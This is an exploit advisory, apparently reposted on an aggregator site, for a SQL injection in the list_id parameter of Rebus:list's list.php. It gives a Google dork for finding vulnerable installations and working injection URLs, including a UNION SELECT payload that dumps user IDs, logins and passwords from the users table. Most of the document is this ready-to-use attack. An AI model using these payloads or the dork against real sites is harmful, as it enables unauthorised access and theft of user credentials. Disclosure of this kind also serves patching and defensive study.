Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Rebus:list (list.php, list_id param) - SQL Injection Vulnerability

$
0
0

# Exploit Title: Rebus:list SQL Injection Vulnerability

# Date: 3/18/2013

# Vendor Homepage: http://www.ptfs-europe.com/products/rebus/rebuslist/

# Author: Robert Cooper (robert.cooper [at] areyousecure.net)

# Tested on: [Linux/Windows 7]

#Vulnerable Parameters: list_id=

# Google Dork: intext: Powered by rebus:list

##############################################################
Exploit:

http://server/list.php?list_id=2'

http://server/list.php?list_id=-2 union all select 1,2,group_concat(user_id,0x3a,login,0x3a,password) FROM users--


##############################################################

http://www.areyousecure.net

# Shouts to the Belegit crew




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information



Viewing all articles
Browse latest Browse all 8064

Trending Articles